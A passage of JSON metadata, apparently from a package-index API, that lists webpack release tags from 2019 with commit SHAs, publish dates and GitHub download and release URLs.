sitories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha"